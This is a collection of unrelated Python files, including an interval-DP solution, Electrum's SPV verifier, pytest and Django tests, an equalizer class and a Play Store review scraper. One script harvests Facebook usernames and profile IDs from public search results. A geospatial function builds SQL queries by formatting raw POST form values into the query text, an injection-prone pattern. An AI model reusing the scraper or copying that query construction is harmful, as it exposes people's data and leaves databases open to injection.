from functools import lru_cache
from typing import List


class Solution:
    def mctFromLeafValues(self, arr: List[int]) -> int:
        """
        [6,2,4]      l  r  k
        [12,24]
        [24, 8]
        [36]
        [32]

        [6,2,4,1]    l  r  k
        [12,24, 6]
        [8]

            24
          6    8
              2  4  1
        """
        @lru_cache(None)
        def cost(left, right):
            if left + 1 >= right:
                return 0
            min_cost = float('inf')
            for k in range(left + 1, right):  # 1
                leaf_costs = max(arr[left:k]) * max(arr[k:right])  # 6, 4
                non_leaf_costs = cost(left, k) + cost(k, right)  # 0, 1 | 1, 2
                min_cost = min(min_cost, leaf_costs + non_leaf_costs)
            return min_cost

        return cost(0, len(arr))
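# A quick sanity check of the solution above, using the worked trace from the
# docstring: for [6, 2, 4] the optimal tree multiplies 2*4 = 8 first, then
# 6*4 = 24 at the root, for a total cost of 32.
if __name__ == '__main__':
    assert Solution().mctFromLeafValues([6, 2, 4]) == 32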
python
screen = None
window = None


class Game():
    scene = 'title'
    state = ''
    interaction = -1
    interaction_level = -1


class Cursor():
    menu = 0


class Camera():
    position = [-6, -40]


class Field():
    location = 'home'
    player_position = [1, 1]
    player_face = 'D'


class Player():
    inventory = []
    cards = []
    deck_1 = []
    deck_2 = []
    deck_3 = []
    life = 20
    level = 1
    tech = []


class Player_Battle():
    deck = []
    hand = []
    hand_change = [False, False, False]


class Battle():
    turn = 0
    play_mode = 'card'
    field = []
    player_grave = []
    enemy_grave = []
python
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2012 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

from .util import ThreadJob
from .bitcoin import *


class SPV(ThreadJob):
    """ Simple Payment Verification """

    def __init__(self, network, wallet):
        self.wallet = wallet
        self.network = network
        self.blockchain = network.blockchain()
        self.merkle_roots = {}  # txid -> merkle root (once it has been verified)
        self.requested_merkle = set()  # txid set of pending requests

    def run(self):
        interface = self.network.interface
        if not interface:
            return
        blockchain = interface.blockchain
        if not blockchain:
            return
        lh = self.network.get_local_height()
        unverified = self.wallet.get_unverified_txs()
        for tx_hash, tx_height in unverified.items():
            # do not request merkle branch before headers are available
            if (tx_height > 0) and (tx_hash not in self.merkle_roots) and (tx_height <= lh):
                header = blockchain.read_header(tx_height)
                if header is None:
                    index = tx_height // 2016
                    self.network.request_chunk(interface, index)
                else:
                    if (tx_hash not in self.requested_merkle
                            and tx_hash not in self.merkle_roots):
                        request = ('blockchain.transaction.get_merkle',
                                   [tx_hash, tx_height])
                        self.network.send([request], self.verify_merkle)
                        self.print_error('requested merkle', tx_hash)
                        self.requested_merkle.add(tx_hash)

        if self.network.blockchain() != self.blockchain:
            self.blockchain = self.network.blockchain()
            self.undo_verifications()

    def verify_merkle(self, r):
        if r.get('error'):
            self.print_error('received an error:', r)
            return
        params = r['params']
        merkle = r['result']
        # Verify the hash of the server-provided merkle branch to a
        # transaction matches the merkle root of its block
        tx_hash = params[0]
        tx_height = merkle.get('block_height')
        pos = merkle.get('pos')
        merkle_root = self.hash_merkle_root(merkle['merkle'], tx_hash, pos)
        header = self.network.blockchain().read_header(tx_height)
        # FIXME: if verification fails below,
        # we should make a fresh connection to a server to
        # recover from this, as this TX will now never verify
        if not header:
            self.print_error(
                "merkle verification failed for {} (missing header {})"
                .format(tx_hash, tx_height))
            return
        if header.get('merkle_root') != merkle_root:
            self.print_error(
                "merkle verification failed for {} (merkle root mismatch {} != {})"
                .format(tx_hash, header.get('merkle_root'), merkle_root))
            return
        # we passed all the tests
        self.merkle_roots[tx_hash] = merkle_root
        try:
            # note: we could pop in the beginning, but then we would request
            # this proof again in case of verification failure from the same server
            self.requested_merkle.remove(tx_hash)
        except KeyError:
            pass
        self.print_error("verified %s" % tx_hash)
        self.wallet.add_verified_tx(tx_hash, (tx_height, header.get('timestamp'), pos))
        if self.is_up_to_date() and self.wallet.is_up_to_date():
            self.wallet.save_verified_tx(write=True)

    def hash_merkle_root(self, merkle_s, target_hash, pos):
        h = hash_decode(target_hash)
        for i in range(len(merkle_s)):
            item = merkle_s[i]
            h = Hash(hash_decode(item) + h) if ((pos >> i) & 1) else Hash(h + hash_decode(item))
        return hash_encode(h)

    def undo_verifications(self):
        height = self.blockchain.get_checkpoint()
        tx_hashes = self.wallet.undo_verifications(self.blockchain, height)
        for tx_hash in tx_hashes:
            self.print_error("redoing", tx_hash)
            self.remove_spv_proof_for_tx(tx_hash)

    def remove_spv_proof_for_tx(self, tx_hash):
        self.merkle_roots.pop(tx_hash, None)
        try:
            self.requested_merkle.remove(tx_hash)
        except KeyError:
            pass

    def is_up_to_date(self):
        return not self.requested_merkle
python
from datalabframework import params, project

import os
from textwrap import dedent

import pytest
from testfixtures import TempDirectory


@pytest.fixture()
def dir():
    with TempDirectory() as dir:
        original_dir = os.getcwd()
        os.chdir(dir.path)
        p = project.Config()
        p.__class__._instances = {}
        project.Config(dir.path)
        yield dir
        os.chdir(original_dir)


class Test_rootpath(object):
    def test_minimal(self, dir):
        yml = '''\
        ---
        a:
            b: 'ohoh'
            c: 42
            s: 1
        '''
        dir.write('metadata.yml', dedent(yml).encode())
        assert(params.metadata() == {
            'a': {'b': 'ohoh', 'c': 42, 's': 1},
            'resources': {}, 'engines': {}, 'loggers': {}, 'providers': {},
            'run': 'default'})

    def test_minimal_with_resources(self, dir):
        yml = '''\
        ---
        a:
            b: 'ohoh'
            c: 42
            s: 1
        resources:
            hello: best:resource
        '''
        dir.write('metadata.yml', dedent(yml).encode())
        assert(params.metadata() == {
            'a': {'b': 'ohoh', 'c': 42, 's': 1},
            'resources': {'.hello': 'best:resource'},
            'engines': {}, 'loggers': {}, 'providers': {},
            'run': 'default'})

    def test_minimal_with_rendering(self, dir):
        yml = '''\
        ---
        a:
            b: 'ohoh'
            c: 42
            s: ping-{{ default.foo.bar.best }}
        foo:
            bar:
                best: pong
        '''
        dir.write('metadata.yml', dedent(yml).encode())
        assert(params.metadata() == {
            'a': {'b': 'ohoh', 'c': 42, 's': 'ping-pong'},
            'foo': {'bar': {'best': 'pong'}},
            'resources': {}, 'engines': {}, 'loggers': {}, 'providers': {},
            'run': 'default'})

    def test_minimal_with_rendering_multiple_docs(self, dir):
        yml = '''\
        ---
        a:
            b: 'ohoh'
            c: 42
            s: ping-{{ ping.foo.bar.best }}
        ---
        run: ping
        foo:
            bar:
                best: pong
        '''
        dir.write('metadata.yml', dedent(yml).encode())
        assert(params.metadata() == {
            'a': {'b': 'ohoh', 'c': 42, 's': 'ping-pong'},
            'resources': {}, 'engines': {}, 'loggers': {}, 'providers': {},
            'run': 'default'})

    def test_multiple_docs(self, dir):
        yml = '''\
        ---
        a:
            b: 'ohoh'
        resources:
            hello: a:1
        ---
        run: second
        c:
            d: 'lalala'
        resources:
            world:
                b: 2
        '''
        dir.write('metadata.yml', dedent(yml).encode())
        assert(params.metadata() == {
            'a': {'b': 'ohoh'},
            'resources': {'.hello': 'a:1'},
            'engines': {}, 'loggers': {}, 'providers': {},
            'run': 'default'})
        assert(params.metadata(all_runs=True) == {
            'default': {
                'a': {'b': 'ohoh'},
                'resources': {'.hello': 'a:1'},
                'engines': {}, 'loggers': {}, 'providers': {},
                'run': 'default'},
            'second': {
                'c': {'d': 'lalala'},
                'resources': {'.world': {'b': 2}},
                'engines': {}, 'loggers': {}, 'providers': {},
                'run': 'second'}
        })

    def test_multiple_files(self, dir):
        yml_1 = '''\
        ---
        a:
            b: 'ohoh'
        ---
        run: second
        c:
            d: 'lalala'
        '''
        yml_2 = '''\
        ---
        resources:
            hello: a:1
        ---
        run: second
        resources:
            world:
                b: 2
        '''
        subdir = dir.makedir('abc')
        dir.write('metadata.yml', dedent(yml_1).encode())
        dir.write('abc/metadata.yml', dedent(yml_2).encode())
        assert(params.metadata() == {
            'a': {'b': 'ohoh'},
            'resources': {'.abc.hello': 'a:1'},
            'engines': {}, 'loggers': {}, 'providers': {},
            'run': 'default'})
        assert(params.metadata(all_runs=True) == {
            'default': {
                'a': {'b': 'ohoh'},
                'resources': {'.abc.hello': 'a:1'},
                'engines': {}, 'loggers': {}, 'providers': {},
                'run': 'default'},
            'second': {
                'c': {'d': 'lalala'},
                'resources': {'.abc.world': {'b': 2}},
                'engines': {}, 'loggers': {}, 'providers': {},
                'run': 'second'}
        })


class Test_metadata_info(object):
    def test_multiple_files(self, dir):
        yml_1 = '''\
        ---
        a:
            b: 'ohoh'
        ---
        run: second
        c:
            d: 'lalala'
        '''
        yml_2 = '''\
        ---
        resources:
            hello: a:1
        ---
        run: second
        resources:
            world:
                b: 2
        '''
        subdir = dir.makedir('abc')
        dir.write('__main__.py', b'')
        dir.write('metadata.yml', dedent(yml_1).encode())
        dir.write('abc/metadata.yml', dedent(yml_2).encode())
        res = ['metadata.yml', os.path.join('abc', 'metadata.yml')]
        assert(params.metadata_files() == res)
python
import os, time, requests, re
from time import sleep

id = []


def search(url):
    global id
    sleep(2)
    req = requests.get(url).text
    usr = re.findall(r'<td class="bz ca"><a href="(.*?)"><div class="cb"><div class="cc">(.*?)</div></div>', req)
    for user in usr:
        username = user[0].replace("/", "")
        if 'profile' in username:
            id.append(username.replace("profile.php?id=", "") + "|" + user[1])
        else:
            id.append(username + "|" + user[1])
    if "Lihat Hasil Selanjutnya" in req:
        url = re.findall(r'<div class="l m" id="see_more_pager"><a href="(.*?)">', req)[0]
        search(url)
    return id


if __name__ == "__main__":
    os.system("clear")
    print("\t\033[1;97mGet Username FB From Public")
    print("\t\033[96m___________________________\033[00m")
    nm = input("\t\033[00mQuery Name : \033[96m")
    print("\n")
    username = search("https://mbasic.facebook.com/public/" + nm)
    for user in username:
        user = user.split("|")
        print("\033[00m" + user[0] + "\033[96m|\033[00m" + user[1])
python
import logging
import json


class Logger:
    def __init__(self):
        pass

    @staticmethod
    def log(info_type, message):
        try:
            uid = json.loads(str(message[0]))['result']
            if len(uid) == 16:
                uid_file = open('./chaostoolbox/data/log/uid.log', 'a')
                uid_file.write(uid + '\n')
                uid_file.close()
        except Exception:
            pass

        # Formatted log output
        LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
        # DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
        logging.basicConfig(level=logging.INFO, format=LOG_FORMAT,
                            filename='./chaostoolbox/data/log/record.log')
        if info_type == "debug":
            logging.info(message)
        elif info_type == 'info':
            logging.info(message)
        elif info_type == 'warning':
            logging.warning(message)
        else:
            logging.error(message)

    @staticmethod
    def get_uid_list():
        with open('./chaostoolbox/data/log/uid.log', 'r') as f:
            uids = [line.strip('\n') for line in f]
        uids.reverse()
        return uids

    @staticmethod
    def clear_uid_file():
        with open('./chaostoolbox/data/log/uid.log', 'w') as f:
            f.close()
python
import os
import glob
import re

path = r'\Documents\python\C++Examples'
gramHash = {}

for filename in glob.glob('*.cpp'):
    outFile = open('KnownCPP.txt', 'a')
    fileOpen = open(filename, 'r', encoding='utf8', errors='ignore')
    fileString = ""
    for line in fileOpen:
        # Removes non ASCII characters
        line = re.sub(r'[^\x00-\x7F]+', ' ', line)
        try:
            fileString += line
        except:
            pass
    fileString = os.linesep.join([s for s in fileString.splitlines() if s])
    fileString = re.sub('\\n|\\r|/\s\s+/g}', ' ', fileString)
    fileString = re.sub('\.', ' ', fileString)
    fileString = re.sub('\\t', '', fileString)
    fileString = re.sub(re.compile("/\*.*?\*/", re.DOTALL), "", fileString)
    fileString = re.sub(re.compile("//.*?\n"), "", fileString)
    fileString = re.sub('[^0-9a-zA-Z]+', ' ', fileString)
    fileString = re.sub('\s+', ' ', fileString).strip()
    outFile.write(fileString)
    fileOpen.close()
python
import torch

from ncc.modules.decoders.ncc_incremental_decoder import NccIncrementalDecoder


class SequenceCompletor(object):
    def __init__(
        self,
        retain_dropout=False,
    ):
        """Generates translations of a given source sentence.

        Args:
            retain_dropout (bool, optional): use dropout when generating
                (default: False)
        """
        self.retain_dropout = retain_dropout

    @torch.no_grad()
    def complete(self, models, sample, **kwargs):
        """Generate a batch of translations.

        Args:
            models (List[~fairseq.models.NccModel]): ensemble of models
            sample (dict): batch
            prefix_tokens (torch.LongTensor, optional): force decoder to
                begin with these tokens
            bos_token (int, optional): beginning of sentence token
                (default: self.eos)
        """
        model = EnsembleModel(models)
        return self._complete(model, sample, **kwargs)

    @torch.no_grad()
    def generate(self, *args, **kwargs):
        return self.complete(*args, **kwargs)

    @torch.no_grad()
    def _complete(
        self,
        model,
        sample,
        **kwargs
    ):
        if not self.retain_dropout:
            model.eval()
        net_output = model(**sample['net_input'])
        return net_output


class EnsembleModel(torch.nn.Module):
    """A wrapper around an ensemble of models."""

    def __init__(self, models):
        super().__init__()
        self.models = torch.nn.ModuleList(models)
        self.incremental_states = None
        if all(hasattr(m, 'decoder') and isinstance(m.decoder, NccIncrementalDecoder)
               for m in models):
            self.incremental_states = {m: {} for m in models}

    @torch.no_grad()
    def forward(self, src_tokens, **kwargs):
        """
        Run the forward pass for a decoder-only model.

        Feeds a batch of tokens through the decoder to predict the next tokens.

        Args:
            src_tokens (LongTensor): tokens on which to condition the decoder,
                of shape `(batch, tgt_len)`
            src_lengths (LongTensor): source sentence lengths of shape `(batch)`

        Returns:
            tuple:
                - the decoder's output of shape `(batch, seq_len, vocab)`
                - a dictionary with any model-specific outputs
        """
        if len(self.models) == 1:
            return self.models[0](src_tokens, **kwargs)
        # Ensembling more than one model was left as a no-op loop in the
        # original code; make the limitation explicit instead.
        raise NotImplementedError('EnsembleModel currently supports a single model only')
python
from django.forms import ModelForm
from django.test import TestCase

from .models import JSONNotRequiredModel


class JSONModelFormTest(TestCase):
    def setUp(self):
        class JSONNotRequiredForm(ModelForm):
            class Meta:
                model = JSONNotRequiredModel
                fields = '__all__'

        self.form_class = JSONNotRequiredForm

    def test_blank_form(self):
        form = self.form_class(data={'json': ''})
        self.assertFalse(form.has_changed())

    def test_form_with_data(self):
        form = self.form_class(data={'json': '{}'})
        self.assertTrue(form.has_changed())

    def test_form_save(self):
        form = self.form_class(data={'json': ''})
        form.save()

    def test_save_values(self):
        values = [
            # (type, form input, db value)
            ('object', '{"a": "b"}', {'a': 'b'}),
            ('array', '[1, 2]', [1, 2]),
            ('string', '"test"', 'test'),
            ('float', '1.2', 1.2),
            ('int', '1234', 1234),
            ('bool', 'true', True),
            ('null', 'null', None),
        ]
        for vtype, form_input, db_value in values:
            with self.subTest(type=vtype, input=form_input, db=db_value):
                form = self.form_class(data={'json': form_input})
                self.assertTrue(form.is_valid(), msg=form.errors)
                instance = form.save()
                self.assertEqual(instance.json, db_value)

    def test_render_initial_values(self):
        values = [
            # (type, db value, form output)
            ('object', {'a': 'b'}, '{\n "a": "b"\n}'),
            ('array', [1, 2], "[\n 1,\n 2\n]"),
            ('string', 'test', '"test"'),
            ('float', 1.2, '1.2'),
            ('int', 1234, '1234'),
            ('bool', True, 'true'),
            ('null', None, 'null'),
        ]
        for vtype, db_value, form_output in values:
            with self.subTest(type=vtype, db=db_value, output=form_output):
                instance = JSONNotRequiredModel.objects.create(json=db_value)
                form = self.form_class(instance=instance)
                self.assertEqual(form['json'].value(), form_output)

    def test_render_bound_values(self):
        values = [
            # (type, form input, form output)
            ('object', '{"a": "b"}', '{\n "a": "b"\n}'),
            ('array', '[1, 2]', "[\n 1,\n 2\n]"),
            ('string', '"test"', '"test"'),
            ('float', '1.2', '1.2'),
            ('int', '1234', '1234'),
            ('bool', 'true', 'true'),
            ('null', 'null', 'null'),
        ]
        for vtype, form_input, form_output in values:
            with self.subTest(type=vtype, input=form_input, output=form_output):
                form = self.form_class(data={'json': form_input})
                self.assertEqual(form['json'].value(), form_output)

    def test_invalid_value(self):
        form = self.form_class(data={'json': 'foo'})
        self.assertFalse(form.is_valid())
        self.assertEqual(form.errors, {
            'json': ['"foo" value must be valid JSON.'],
        })
        self.assertEqual(form['json'].value(), 'foo')

    def test_disabled_field(self):
        instance = JSONNotRequiredModel.objects.create(json=100)
        form = self.form_class(data={'json': '{"foo": "bar"}'}, instance=instance)
        form.fields['json'].disabled = True
        self.assertTrue(form.is_valid())
        self.assertEqual(form.cleaned_data, {'json': 100})
        # rendered value
        self.assertEqual(form['json'].value(), '100')
python
import collections


class Equalizer:
    def __init__(self, levels: list):
        _dict = collections.defaultdict(int)
        _dict.update(levels)
        _dict = [{"band": i, "gain": _dict[i]} for i in range(15)]

        self.eq = _dict
        self.raw = levels

    @classmethod
    def build(cls, *, levels: list):
        return cls(levels)

    @classmethod
    def flat(cls):
        """Flat Equalizer.

        Resets your EQ to Flat.
        """
        return cls([(0, .0), (1, .0), (2, .0), (3, .0), (4, .0),
                    (5, .0), (6, .0), (7, .0), (8, .0), (9, .0),
                    (10, .0), (11, .0), (12, .0), (13, .0), (14, .0)])

    @classmethod
    def boost(cls):
        """Boost Equalizer.

        This equalizer emphasizes Punchy Bass and Crisp Mid-High tones.
        Not suitable for tracks with Deep/Low Bass.
        """
        return cls([(0, -0.075), (1, .125), (2, .125), (3, .1), (4, .1),
                    (5, .05), (6, 0.075), (7, .0), (8, .0), (9, .0),
                    (10, .0), (11, .0), (12, .125), (13, .15), (14, .05)])

    @classmethod
    def metal(cls):
        """Experimental Metal/Rock Equalizer.

        Expect clipping on Bassy songs.
        """
        return cls([(0, .0), (1, .1), (2, .1), (3, .15), (4, .13),
                    (5, .1), (6, .0), (7, .125), (8, .175), (9, .175),
                    (10, .125), (11, .125), (12, .1), (13, .075), (14, .0)])

    @classmethod
    def piano(cls):
        """Piano Equalizer.

        Suitable for Piano tracks, or tracks with an emphasis on Female Vocals.
        Could also be used as a Bass Cutoff.
        """
        return cls([(0, -0.25), (1, -0.25), (2, -0.125), (3, 0.0),
                    (4, 0.25), (5, 0.25), (6, 0.0), (7, -0.25), (8, -0.25),
                    (9, 0.0), (10, 0.0), (11, 0.5), (12, 0.25), (13, -0.025)])
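# A small illustration of the data the class above produces: every preset
# expands its (band, gain) pairs into the fixed 15-band list stored on `eq`,
# while `raw` keeps the original pairs. Bands missing from a preset (such as
# band 14 in piano()) default to a gain of 0 via the defaultdict.
eq = Equalizer.boost()
print(eq.eq[0])    # {'band': 0, 'gain': -0.075}
print(eq.raw[:2])  # [(0, -0.075), (1, 0.125)]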
python
# Copyright 2019-2020 SURF.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from datetime import datetime
from typing import Dict, List, Optional
from uuid import UUID

from orchestrator.schemas.base import OrchestratorBaseModel

TagConfig = Dict[str, List[Dict[str, bool]]]


class FixedInputBaseSchema(OrchestratorBaseModel):
    fixed_input_id: Optional[UUID]
    name: str
    value: str
    product_id: Optional[UUID]


class FixedInputSchema(FixedInputBaseSchema):
    fixed_input_id: UUID
    created_at: datetime
    product_id: UUID

    class Config:
        orm_mode = True


class FixedInputConfigurationItemSchema(OrchestratorBaseModel):
    name: str
    description: str
    values: List[str]


class FixedInputConfigurationSchema(OrchestratorBaseModel):
    fixed_inputs: List[FixedInputConfigurationItemSchema]
    by_tag: TagConfig
python
import sys, os
import traceback
import time
import shutil
import json
import requests
from selenium import webdriver
from PIL import Image


class ScriptError(Exception):
    pass


def iw(webhook: str, message: str):
    """ post message to slack channel """
    data = json.dumps({'text': message})
    res = requests.post(webhook, data=data)
    return res


def files_upload(token: str, channel: str, filename: str, comment: str):
    """ upload file to slack channel """
    url = 'https://slack.com/api/files.upload'
    files = {'file': open(filename, 'rb')}
    data = {
        'token': token,
        'channels': channel,
        'filename': filename,
        'initial_comment': comment,
        'filetype': 'jpg',
        'file': files
    }
    res = requests.post(url, data=data, files=files)
    return res


def dl(url: str) -> str:
    """ download file from web and save to local """
    filename = os.path.basename(url)
    res = requests.get(url, stream=True)
    if not res.status_code == 200:
        time.sleep(60)
        res = requests.get(url, stream=True)
        if not res.status_code == 200:
            return 'Fail'
    with open(filename, 'wb') as file:
        res.raw.decode_content = True
        shutil.copyfileobj(res.raw, file)
    return filename


def concat_h(images: list):
    """ connect images(list) horizontally """
    n = len(images)
    im0 = Image.open(images[0])
    ret = Image.new('RGB', (im0.width * n, im0.height))
    for i, img in enumerate(images):
        im = Image.open(img)
        ret.paste(im, (im0.width * i, 0))
    return ret


def concat_v(images: list):
    """ concat images(list) vertically """
    n = len(images)
    im0 = Image.open(images[0])
    ret = Image.new('RGB', (im0.width, im0.height * n))
    for i, img in enumerate(images):
        im = Image.open(img)
        ret.paste(im, (0, im0.height * i))
    return ret


def prev_flyer() -> dict:
    """ get previous flyer info from my WebAPI """
    url = 'https://mollinaca.github.io/flyers/latest.json'
    # url = 'https://mollinaca.github.io/flyers/latest_test.json'
    res = requests.get(url)
    if res.status_code == 200:
        body = res.text
    else:
        time.sleep(60)
        res = requests.get(url)
        if res.status_code == 200:
            body = res.text
        else:
            raise ScriptError('Error: get latest.json not 200')
    ret = json.loads(body)
    return ret
python
import json
from time import sleep

try:
    from typing import Optional, Tuple
except ImportError:
    pass

from google_play_scraper import Sort
from google_play_scraper.constants.element import ElementSpecs
from google_play_scraper.constants.regex import Regex
from google_play_scraper.constants.request import Formats
from google_play_scraper.utils.request import post

LANG_DEFAULT = "en"
COUNTRY_DEFAULT = "us"
SORT_DEFAULT = Sort.NEWEST
COUNT_DEFAULT = 100


class ContinuationToken:
    __slots__ = "token", "lang", "country", "sort", "count", "filter_score_with"

    def __init__(self, token, lang, country, sort, count, filter_score_with):
        self.token = token
        self.lang = lang
        self.country = country
        self.sort = sort
        self.count = count
        self.filter_score_with = filter_score_with

    def unpack(self):
        return (
            self.token,
            self.lang,
            self.country,
            self.sort,
            self.count,
            self.filter_score_with,
        )


async def _fetch_review_items(url, app_id, sort, count, filter_score_with, pagination_token):
    dom = await post(
        url,
        Formats.ReviewsBodyData.build(
            app_id,
            sort,
            count,
            "null" if filter_score_with is None else filter_score_with,
            pagination_token,
        ),
        {"content-type": "application/x-www-form-urlencoded"},
    )
    match = json.loads(Regex.REVIEWS.findall(dom)[0])
    return json.loads(match[0][2])[0], json.loads(match[0][2])[-1][-1]


async def reviews(
    app_id,
    lang=None,
    country=None,
    sort=None,
    count=None,
    filter_score_with=None,
    continuation_token=None,
):
    # type: (str, str, str, int, int, Optional[int], Optional[ContinuationToken]) -> Tuple[list, ContinuationToken]
    if continuation_token is not None:
        token = continuation_token.token
        lang = continuation_token.lang if lang is None else lang
        country = continuation_token.country if country is None else country
        sort = continuation_token.sort if sort is None else sort
        count = continuation_token.count if count is None else count
        filter_score_with = (
            continuation_token.filter_score_with
            if filter_score_with is None
            else filter_score_with
        )
    else:
        token = None

    if lang is None:
        lang = LANG_DEFAULT
    if country is None:
        country = COUNTRY_DEFAULT
    if sort is None:
        sort = SORT_DEFAULT
    if count is None:
        count = COUNT_DEFAULT

    if count < 200:
        _count = count
    else:
        _count = 199

    url = Formats.Reviews.build(lang=lang, country=country)

    result = []
    while True:
        try:
            review_items, token = await _fetch_review_items(
                url, app_id, sort, _count, filter_score_with, token
            )
        except (TypeError, IndexError):
            token = None
            break

        for review in review_items:
            review_dict = {}
            for k, spec in ElementSpecs.Review.items():
                review_dict[k] = spec.extract_content(review)
            result.append(review_dict)

        remaining_count_of_reviews_to_fetch = count - len(result)
        if remaining_count_of_reviews_to_fetch == 0:
            break
        if isinstance(token, list):
            token = None
            break
        if remaining_count_of_reviews_to_fetch < 200:
            _count = remaining_count_of_reviews_to_fetch

    return (
        result,
        ContinuationToken(token, lang, country, sort, count, filter_score_with),
    )


async def reviews_all(app_id, sleep_milliseconds=0, **kwargs):
    kwargs.pop("count", None)
    kwargs.pop("continuation_token", None)

    _count = 199
    _continuation_token = None

    result = []
    while True:
        result_, _continuation_token = await reviews(
            app_id, count=_count, continuation_token=_continuation_token, **kwargs
        )
        result += result_
        if _continuation_token.token is None:
            break
        if sleep_milliseconds:
            sleep(sleep_milliseconds / 1000)

    return result
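# A minimal usage sketch for the async API above; 'com.example.app' is a
# hypothetical package name, and pagination works by feeding the returned
# continuation token back into the next call.
import asyncio

async def demo():
    batch, token = await reviews('com.example.app', lang='en', country='us', count=50)
    print(len(batch))
    # Fetch the next page by passing the continuation token back in.
    more, token = await reviews('com.example.app', continuation_token=token)

asyncio.run(demo())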
python
from ..sql_helper import SQLHelper
from shapely import wkb
from shapely.geometry import Polygon

from .filtering import filtering_objects


def generate_rectangle_information(form):
    """
    Generate information for an area.

    :param form: form from the POST request with the coordinates of the
        area (rectangle) and the 6 main filters
    :return: dict with the transformed information
    """
    sh = SQLHelper()
    rectangle_coord = form.pop('rectangleCoord')
    filters = filtering_objects(form)

    x1 = rectangle_coord[0]
    y1 = rectangle_coord[1]
    x2 = rectangle_coord[2]
    y2 = rectangle_coord[3]

    sql_text = """
        select sum(people) as sum,
               ST_Area(ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326)),
               ST_Area(ST_Union(geometry)) as all_area
        from (
            select geometry,
                   people,
                   ST_IsEmpty(ST_Intersection(ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326), geometry)) as flag
            from "Moscow" m
        ) as a
        where flag is False;
    """.format(x1=x1, y1=y1, x2=x2, y2=y2)
    sql_result = sh.execute(sql_text)

    people_sum = None
    st_area = None
    all_area = None
    for row in sql_result:
        people_sum = float(row['sum'])
        st_area = float(row['st_area'])
        all_area = float(row['all_area'])
    people_st_area = people_sum * st_area / all_area

    sql_text = """
        select grouped,
               count(latitude) as cnt,
               sum(area) / 1000000 as area_sum,
               string_agg(distinct zones_type, ', ') as zones_type_agg,
               string_agg(distinct sport_type, ', ') as sport_type_agg,
               ST_Union(geometry) as geometry
        from (
            select 'grouped' as grouped,
                   object_id,
                   area,
                   zones_type,
                   sport_type,
                   st_contains(ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326), geometry) as flag,
                   latitude,
                   ST_MakeEnvelope({x1}, {y1}, {x2}, {y2}, 4326) as geometry
            from "Objects" o
            {filter}
        ) as t
        where flag is true
        group by grouped
    """.format(x1=x1, y1=y1, x2=x2, y2=y2,
               filter='' if not filters else 'where {}'.format(filters))
    sql_result = sh.execute(sql_text)

    cnt = 0
    total_area_of_sports_zones = 0
    types_of_sports_zones = ''
    types_of_sports_services = ''
    geometry = None
    for row in sql_result:
        cnt = float(row['cnt'])
        total_area_of_sports_zones = float(row['area_sum'])
        types_of_sports_zones = row['zones_type_agg']
        types_of_sports_services = row['sport_type_agg']
        geometry = row['geometry']

    if not geometry:
        geometry = Polygon()
    else:
        geometry = wkb.loads(geometry, hex=True)

    cnt = round(cnt * 100000 / people_st_area, 2)
    total_area_of_sports_zones = round(total_area_of_sports_zones * 100000 / people_st_area, 2)

    result = {
        'count': cnt,
        'avrgArea': total_area_of_sports_zones,
        'typeZones': types_of_sports_zones,
        'typeServs': types_of_sports_services,
        'geometry': geometry
    }
    return result
python
from enum import Enum, unique


@unique
class MeboCommands(Enum):
    READERS = "READERS"
    FACTORY = "FACTORY"
    BAT = "BAT"
    WHEEL_LEFT_FORWARD = "WHEEL_LEFT_FORWARD"
    WHEEL_LEFT_BACKWARD = "WHEEL_LEFT_BACKWARD"
    WHEEL_RIGHT_FORWARD = "WHEEL_RIGHT_FORWARD"
    WHEEL_RIGHT_BACKWARD = "WHEEL_RIGHT_BACKWARD"
    WHEEL_BOTH_STOP = "WHEEL_BOTH_STOP"
    ARM_UP = "ARM_UP"
    ARM_DOWN = "ARM_DOWN"
    ARM_POSITION = "ARM_POSITION"
    ARM_STOP = "ARM_STOP"
    ARM_QUERY = "ARM_QUERY"
    WRIST_UD_UP = "WRIST_UD_UP"
    WRIST_UD_DOWN = "WRIST_UD_DOWN"
    WRIST_UD_POSITION = "WRIST_UD_POSITION"
    WRIST_UD_STOP = "WRIST_UD_STOP"
    WRIST_UD_QUERY = "WRIST_UD_QUERY"
    WRIST_ROTATE_LEFT = "WRIST_ROTATE_LEFT"
    WRIST_ROTATE_RIGHT = "WRIST_ROTATE_RIGHT"
    WRIST_ROTATE_POSITION = "WRIST_ROTATE_POSITION"
    WRIST_ROTATE_STOP = "WRIST_ROTATE_STOP"
    WRIST_ROTATE_QUERY = "WRIST_ROTATE_QUERY"
    CLAW_POSITION = "CLAW_POSITION"
    CLAW_STOP = "CLAW_STOP"
    CLAW_QUERY = "CLAW_QUERY"
    SET_TURNING_SPEED_1 = "SET_TURNING_SPEED_1"
    SET_TURNING_SPEED_2 = "SET_TURNING_SPEED_2"
    SET_TURNING_SPEED_3 = "SET_TURNING_SPEED_3"
    CAL_ARM = "CAL_ARM"
    CAL_WRIST_UD = "CAL_WRIST_UD"
